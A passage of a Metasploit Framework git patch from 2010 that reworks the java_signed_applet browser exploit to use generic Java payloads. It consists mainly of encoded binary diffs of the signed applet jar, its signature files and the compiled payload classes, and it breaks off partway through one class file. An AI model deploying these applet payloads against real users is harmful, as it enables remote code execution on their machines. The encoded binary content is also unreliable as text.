From 191c4e8eb77272912aa130c8d6ff9f8cc884db73 Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Tue, 30 Nov 2010 03:50:40 +0000
Subject: [PATCH] make java_signed_applet work with generic java payloads, but
 keep the default target as Windows/x86 since it is by far the most common
 victim.

git-svn-id: file:///home/svn/framework3/trunk@11172 4d416f70-5f16-0410-b530-b9f4589650da
---
 data/exploits/java_signed_applet.jar          | Bin 5304 -> 0 bytes
 .../java_signed_applet/META-INF/MANIFEST.MF   |   9 +
 .../java_signed_applet/META-INF/SIGNFILE.DSA  | Bin 0 -> 1084 bytes
 .../java_signed_applet/META-INF/SIGNFILE.SF   |  11 +
 .../metasploit/Payload.class                  | Bin 0 -> 8177 bytes
 .../metasploit/PayloadApplet.class            | Bin 0 -> 339 bytes
 .../src/metasploit/PayloadApplet.java         |  14 +
 .../multi/browser/java_signed_applet.rb       | 413 +++---------------
 8 files changed, 101 insertions(+), 346 deletions(-)
 delete mode 100644 data/exploits/java_signed_applet.jar
 create mode 100644 data/exploits/java_signed_applet/META-INF/MANIFEST.MF
 create mode 100644 data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA
 create mode 100644 data/exploits/java_signed_applet/META-INF/SIGNFILE.SF
 create mode 100644 data/exploits/java_signed_applet/metasploit/Payload.class
 create mode 100644 data/exploits/java_signed_applet/metasploit/PayloadApplet.class
 create mode 100644 external/source/javapayload/src/metasploit/PayloadApplet.java

diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar
deleted file mode 100644
index 1d210de53640763c7c719003d067df9c915bee04..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5304
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
Mw`$XOz^~mu0Pp!MyZ`_I

diff --git a/data/exploits/java_signed_applet/META-INF/MANIFEST.MF b/data/exploits/java_signed_applet/META-INF/MANIFEST.MF
new file mode 100644
index 0000000000..362a05b2de
--- /dev/null
+++ b/data/exploits/java_signed_applet/META-INF/MANIFEST.MF
@@ -0,0 +1,9 @@
+Manifest-Version: 1.0
+Created-By: 1.6.0_18 (Sun Microsystems Inc.)
+
+Name: metasploit/PayloadApplet.class
+SHA1-Digest: X/L7jWCXGQGhITfOvpnJg+jgUZM=
+
+Name: metasploit/Payload.class
+SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
+
diff --git a/data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA b/data/exploits/java_signed_applet/META-INF/SIGNFILE.DSA
new file mode 100644
index 0000000000000000000000000000000000000000..433f92bb192e6f4694505530c26a706e49af8efd
GIT binary patch
literal 1084
zcmXqLVzFT3)N1o+`_9YA&a|M3Mbn^(MU{z>(U9AKlZ{oIkC{n|mBD};p@?xo6SKZS
z6SKBK6VuBD%uI|-Oe{Wc=Qjb>umcS`XTib@)KCf5&m79aCd?EX4C8PJGlfJL@*D87
z0cF^Q*&IuYOEU8eB@Dzs0$jrUzNsaN#RWO}nI$?3K0eMc8E%|1%os8Ta^k#(28M=4
zCPv0a76wL9K(3*I5fDJQ1L?FT#_a}8j5@G@Vgz#JnHn1z{?-RK%9aXg2Hp3Xqxa^?
z^KXLNgKXZrFdUY%Z`c;7mgySnpcME!(zZ9^*Z!klcNu&;Jv%h#dZTrNtV#Z-w1n;1
zGXs_`nLqypOSOQ~A^+Vgum9VAO!|j)`14~cmWlGS{BHhs`Ka7sCesk%D6xq~-%3BP
z(@wmu_5PC*v*g^19*oDCL>Z<h1oVq4bD!BXX=l@-*Dc&1B4oaToc8_Ug4S!ZZSS4l
zvpU9XNBGXlDeHItvU=6@Gu(&Umc1!GFfzPv*Of^BXNBwnjSX8o#R`>Q_-Kd;Z$Hmz
z)N^9lLmRQG?vR>ZjR%X@$!Tw1Ryr|naXt4hMbo5@zmuvMRjkh}`M7UI;DpW<&G#Qh
zJ)O@ssXHyMp*mDGh0(|Q-+50h=EfEVrpAUC4G~63uCvvzVwlB3wVv&r@q6(c0X8$P
zuFLX@94_ab9o{tkeOSTx`&fyui!FDr<-FV%xqXavAGSC2&OE+PBlJ+sw(|Aj2XjtM
z>Ub=)<JMXw*LSa&*%{-%`W4K#(!NspUb*XE%yEIhxgC})BKaar<xPJI)VB+=Kb`nr
zeWGZa6-w%6)@Lx#VG=3m-EwugL+jj5uBF!^XZ9R34E=SFNhIvqndYSRnZ9e*@9<(+
z@WFHD#uo~Pjh74>&jWLnL1W_prax##MakFDJj=++z@i886mMd}w7>11<$~M+c_*K3
heeGfPXf=~ao#}VBgt?W9TB*yfW-O8p&Pr3@0syXmXea;x

literal 0
HcmV?d00001

diff --git a/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF b/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF
new file mode 100644
index 0000000000..9e3e356392
--- /dev/null
+++ b/data/exploits/java_signed_applet/META-INF/SIGNFILE.SF
@@ -0,0 +1,11 @@
+Signature-Version: 1.0
+SHA1-Digest-Manifest-Main-Attributes: s1TdOxe3gzjQrMmw0MCPecT0Dpk=
+Created-By: 1.6.0_18 (Sun Microsystems Inc.)
+SHA1-Digest-Manifest: /3/N9PvurH7pif9Ej6Ki35dLu2A=
+
+Name: metasploit/PayloadApplet.class
+SHA1-Digest: y6+heNFX7iv2UtUFv9ziltcUeAs=
+
+Name: metasploit/Payload.class
+SHA1-Digest: 70nbz45oAy6s9DR1vxQIhIxgzLc=
+
diff --git a/data/exploits/java_signed_applet/metasploit/Payload.class b/data/exploits/java_signed_applet/metasploit/Payload.class
new file mode 100644
index 0000000000000000000000000000000000000000..c1e8e9d384174116bbe7705ae68a2a585db92578
GIT binary patch
literal 8177
zcmb7J33wcJ*?-@?W_B_;y6v`XL!m%{G$+(Hz!s2@1{%mkH#CHT?KGJ-OE)`VchaVK
zp%xHD!3!ui6%C?jNp%wlhi5swP(MM?&kH;dZv;>1_j_k%vy(LVJYSwC|C#^s-sgYz
zsW%>al!DX{SfbH-`k6vMSLhcSeUN^sVfh7(rsze5ex;E@FGgvIey!4PG(3N+&`TQW
z^rC?MPNP%kWtsk7r9a5?k1G91cK$4Yf6?f#^omM<lgX<py{6LNHCjghkl~*S{Y#$z
zR_Q<T1j%Lex(sg!okJQEv&sRia8M>8mBT7WfQuCkJ5dm4O{Qfk>vF7Ih6;r%H9DEA
zR9+yPF-+(cjTiDFh2ttO26kSe@)5F>(0D0V%W!0voImAhjhFFJg6U{)i3XtnUM|Bi
zDj%!zaSE@9^6`8EB;^wou93+~jcd71;d+%DRBjZUO$wg`mGa3duTuFfDzA?68g7>1
z6opUKsGm<$IH}PlUMs`t7{Dr)t7SMt;WJf!tIB7o+@g`eXUotk!#aiAL`yHKe2&O-
zuFC77Y;G6H&r|q(jV$g^xKpFcVMp%LC@&_voVyk7QTPIdH>jM_XpCM^xL2cHe4$1=
zd85Gf$#4-ofcs^*SmjM3=p`y&Dmr+Z%A4i6MP);tTU8!Vcu-+eqw9E^2)td^hh#{r
ze3>w~L*<M-hgHtX(-H-bD15m_Hw$A!oWmREqgb{@!cmoXih*~jJf`t(zCyO&F5B;b
zpYc0o?OpQrZaH<O4DXTQy)wK{hCMP|CBxM!U!(CFdNs=L=WAu<1H#(}RlZK1A5!_l
zDqpYi4GMpRN$E~)?rQ05V~TZLX6!VYGDdcLQ_9Yzv)k7)sXZ;d>o=#`dYB^Zsm(3z
z7r{3#b|>q)Q%uqGS~j+9Uf(Skju^-o`TUAu(>C%W87pnC=rML@EMt&qfe(4BoC5A>
zYIoKiGVSyLh`XS|!HTrC;+%BGWLh?Rah+is?b(r08{C=3Fw@f6``x3qZ*z%}%Ne^@
zICNKtP%B)a!29XxY}!7PDOj^|BU7l=8U(S>u#wI(Ew0(*W7X4x9Mjsy2FwvVZDsQi
zXICz5n{C5e&A~x)(B*b@jStY3(YN4Xa#zw;lfbN9xl!SdD*Q3%Vyk7@c{^u}Fr_?1
zIOP*}?F^`2PH)w3v^U|uYP)HlmowYO%z;tc*ed!x!Ow9~)WdmZ(v88vwlUkx<{>_q
z-ImS{wrAI+b4;_Oo+YH8r<F6zJ8}a>*2)bVne-K4<JdQ6qo^qO>0mmaHwSE{6X!cV
zkI*o*>mN+V&j;cY)U_78{q%v1;~P4Eoc@<-c_|{CBVCq#jy0NvE<9IYI;wP}%W@8_
zGq<^iaycuf^C$R5ogU|#FwhfBi=6YLb~@A4le0$5oSioFI(?bGf*>eGPNNq&I{ic#
zSzMyx>iF!@ZQD#>zZuwhFW;i`t$Z6KZgfP}`F6gMsj|t3aL}-IzJu@7`7XX&;e9%P
zQuu*e7ac<9d+2|F<6Zd?V;9UEYP5$(bp8}QtMjLM9B$xn;n_szdxb`*aWD-&KEvZ8
z<$XGRo4%v)XLbG@-;X$12N_39D6B-}^TP5Mct2A(<r3nPK$;&=ctYm`{6(F=#08xv
zd5WoGt^^PALpo0jH%Iun@yCQP@-P#!<s<y4!jI|vWrlXE=IRj4%aTq%5V5reM|C5H
zJ*4wj`D+S)UFUD`L7gAxg9<;P^OO9P&flabbb6E?(dlbqGDjtiX{*uA0p)qqF3AcD
zlxRA>q42kK{x*F@=kM@$XR*}1^)h(3&QJ6A6#l->KVa~5bP2r6N{tQ-b(;2&<#)gE
zz|gRT{2Hhm)A@(|4Aa6A%#54r{H)kI+|kp$p%-GW#-B{rcc*$4{*lhl@$)+Wn152_
zIBVKXDQjSdX^S%9fN=+_vux&enz_>EPj&to|6J!^@GqGX&N0WkT|e!$c9>a2IWk3=
z=hDj?8kU1j$~Lx}Jx0!eh0PptDlZpWFX;RtKcn-n#JPL{(KJ&^%8O~&!JyOk==%U}
z()ri?8=Zg4FEK4~*np$XDH%fG?jo1SCZovWyPJB<+%S@ho7t-!(3!oKOs2H0^Y8fO
zV#v=NK^WUG9l+OFZVhogbLN25my|V{8$hmeLrC;^;f4+*oNXur$)={J!>|q@Gc>hI
zdf1j8Fl<v;|Gf-<(D{#|pg-}Sb^Z(gRp(duZ%~!+J>r(z#=PjZQRi3rHJBN*9PIdY
z@mEJP;;)Bk<{Pr@WGC649Zv^kZ=suG8zrwddYOKfyY&v`tX*zpah(tb=s_Rh)oWq?
z@9;$ahfWVm06j(zp$0eQhje;|o`qXBZB1u&`k_Q)sL>pQ%s-;%bpEGAyBkTKXBh)K
zbb6kCtn<J4ex3hK$O-?EQw*VB=Qj`!jg1N)(gOrl1(;vc1A#ygNiq=91K~hK-V{Bc
z2BLaE3zX>rJy5O(D&%lwph`9tV1o;&J666i3m;ViF+H#_ut*QY1B-QfP<XG9WYL&6
zN8rUaay?Bu5*g_+a3T$k*rajD8iwKB0CH-glL<P|7D-erE4r#Aka_CMj3(Q=XTlj=
zZL@M+;0kFAWxdnP=V5S|uf{91{@M%L^Oe7izyeqoi;^=(GKM(l;+odhd67g6B=Rg$
zP5pe>e8tpXprnJeEq4XJ0(u+Fyb}s7d8|5J+{!n{2M6+ZKyVAUn>@k;nX@l#T1j92
zPBA=?vGS0v3><i6cQ@=e01j-k*Bl;k(|2Uh%pe;%ogtdsN}O)lnzu5eHZqkxgjgEh
zfpW)mT!{gJoTm#b@#6UGdLuvNbzPC1Ic)6&ky-7RoB!APRqrjKOn{G8BWq=m2{JAt
zL3FxIr}|ar9rsz{zu}w(>P52;)LZeh<1L}6J1*<ESbNqsw~HIAh=II`>6>_4JG^bD
zkr_3+x5<h2c@dYPdX}v7|L1T<VdY|GBWGr9*REB?xPZer_ClBASW;T~Ii?iDA!S-Q
zSg5YF=TC@lVs4*aHjHNNbTK?<Ch;O0j_$l=gh&Xv4tJoMd9NNmqd+$U2z5aCNO_C!
zW(e(z7UcROxjA9t9&MBMv>1cF-UwOTlp9+(pD|6`MnW~`iAr=gG`h2GV`&)K$H3W^
zl`#$J7km4A+K~0Yhufzxo#l5>&w>1{x|0fLIepIDmO(XbaxsW<dN*7MtP6d5@F-%_
zt+b9hX9L2(>FiE4A55qDdGK7s&%=L<5@nZ>M#~Qe$6XOVTsh*_GZdiSoRcqonoI4@
z+a|810l7!UU49Q!ebAD?E$#XWB;;A_=hf3!yQn{ekijEj49Lv`>L}W_)Tsen5|-al
zp`hY9Fyi0A;rZ@SJ|%n9g=*OVE<Lu>${}E)S#!*tfGy8gYBrrM>Ipm7VuU*8?GD31
z+#FHlJh5h4qEb(VJ22BKZ{O>S)_UfdIX<@;a)4UqA}#e<UVzTPm&mnR8F4Q(YYq<7
zJp(scC^RZ>=Zt1Ds0(2cN8}zfanm&&CuM4%$2KCStFscVIql#q?{@ti(Ue0O%<L?p
zUgSsZ#e~q$n!DPwXy39@nP(UGnOv9fVCNcG1n|{Kzn{rg#2icKZJ0AOGMYzai_Ww$
zOyxsHz7q+sXz_@7`KXb>*;$Q5F>X*O-5_uZ-9~6v;w6-K?)JeE3poVWBCkhk9Wt=V
ztxVN5^Yj_+wHD49MIjzW{%(<AnO!bsB%jrY6uCLfgJ)1G_-J8{N&S&vg11KVqg(UN
zhb{>``0HV?V5H2pgy$Cdm?V%ZH-Yy^#>{S)ejqX+d*D$}Vk0bQfZC^!4huya=2P0b
z&h2PVtw*cw(s9(~?z(h3tX*cV)sQ}=*c$lH%)=fXgRi1f_>!y9QfW!?wp5x>=ZPNM
zdE&C_Jkf6BsmiAYV)`oHWrka<Z-zU9Z-y&@Z-z_2%&ZJ=_?&_9NnlxkC+^!6uAQXF
z1A>>L^b~!Q0<s;nD1svtOih#0KS^rG1VtaG%9u7qW&H;zI!+O+bWW3w-SYYZRa7-r
zH5I6`Kvl5?7zz~Ys*f!!(4u505jsc}b%{`c;xa6*i!CY85y@~Oe2})p60xOIRGo|@
zA_Y3KZ<?0%dst=RD8YBMi*J&aCzXU!pktg<2_+Gpq+^q6eIlGtr|38b?TWs-*zpOq
zKqnOFM7-C;Ru-ssit3sp*buTxJaPvgiJf>PG&n`zy`itjges7;nZUwaCZfV*A{uKH
z@|rtokoU4gS%IL1lltl#5@ld%nojOdXp^)msn;d+*joy;I-wV6%@j2&kI*Uo!Pu!&
zbXuxE6icT1!-*(prTQbH&QyWcCd(7$1v(uXljj+DE}}E1=q!LP>klT%0Ot@CPz`X2
zXewC|Y_5z~CMq7?M{9!3Rq?7SZ66(<sEAjtf@FIsGEPgpS<50i8`$<#@%W+V_f%qh
za-0Vf%0ar#kx3DSs}r>D78;nKHZlJ>uKC*>^S8y$4Lw5Z`-2nI4tCE=sF<EF(+*5K
z`^KS>C?t)zl6H%jJ;JLZ!WHNOoY0a{kvfHA0ER-`%|3@}%(aG$Q0kF5ey}dq8@tdm
zs9G1>$aqgi<Ld2HH9>tzZGtXJmW|UHiReLEI8FU9Q(T>-i<9~|EuE%K{W816RqUln
zUG(}kvB>76CXX%2vS~7k4j9`C$E%ACh}~*kAB+u7k_kAR-3ES><-z8PctxTd>Ry;A
z#~U`br}k7pnJ-V%5P~C}&=O^JvCD+hMENA`cz^-{C9pPdCUxO?X<!R&K=6GF{~<)=
z2IK{Nj&sA1F2tIGo%UKUCSn<3$>jyH)g=yAFa8x;P(=@`$#6p=T%h6p=1Aa9s!D_s
z;b0tLlpR0xl7!wGH`0Yz1SGyoPg6`j#<=8oC5V*~aeSJr{<=vTNrtECatM)=z?-H#
zUhM*nPSZ~4Xczv+`eVB%>5AYZ^!7=5M*=SM&ZOG#IGrYJysJ4HkAf);0jd?~-L<v&
zIV%{Cib1dJPlB)a%pAM@(6i%IU6k^@kg&m(a*Ei^4ex`iL}Gj3O^(Z5CH{D|>yKAC
z{&*D}Y=W+l_4m8$*Es9fz~?6DT3P>qyMC>+ey!uQQ6PlVCc=QO7w-&t&Kr{iHBHxv
zem_*84?iIJk^>yZPmr_ig>RAAldO6%6dAy?i;*y|-%HCpfhOn%NE7>rD-zPtM?2~s
zpS$}p|L#FjVdkUu<Lt-x1EbUnd}Z<I)Pag*@1s5Z;++VYy`;uIF-~D|SjoUeKzyq4
z09V1GLI6AgcyH|FuKEJqw3iYR@AY*cg)G(u#ou%bg}JMt2#-%X9{huVjsX7tX}THC
zu(tzvZt1M64<ftVinMI>*N0Y3&~1nk!E^gwYQ<xFG8DT*{O?XlK!;w6-Q`V=gp7BG
z_mM6Ppb{<LkA;1b7o2i&Yv1^xhdmLKp<r`39u|Oov?3l3-9vf;_Wopn?&(W}>f&&?
zPZj9XeS5+PzUQ0_28uC33Wi00`1<6E!BL2zV(oRnpI%$lRE^42b%~7Ub7yT;vOwc!
zF1v%Sc655>ve1_1P;D>{boX{b)t`~DC>FjdK-~j6or!Qfw7U8((&C}e78oHOY7P~7
zk6@z2QLvCFYH(1IgB9`;8eCm{Ctf4Ys>rfO0sqfP@r#{5P8WdQeUSC7wV?i4KsDD^
zL(<QIp=u%Iyv9S}d#F-4l!bf8DOB583)9|Lp!<QN90utW`1{WfJ4qIP9;!{bYEk9a
z3b>QF?+N%}UEDVYtMdMiX$tm3-=RqgKjyewh{Dc(u@U*{OgquytP`z?eSV6*FhTnZ
n^uPg{h#kP}0DUp`r3spV`47<b6POj8*LAT;XZHp-DbfD{G8)X}

literal 0
HcmV?d00001

diff --git a/data/exploits/java_signed_applet/metasploit/PayloadApplet.class b/data/exploits/java_signed_applet/metasploit/PayloadApplet.class
new file mode 100644
index 0000000000000000000000000000000000000000..946b38e060f6dcc86203a9f11e17da30adafecc0
GIT binary patch
literal 339
zcmZWkF;2rk5S+E0oG}g|352xi0top5AS8t7QXnOwp;{a(99(S6oCv&#It?HS9>Ajz
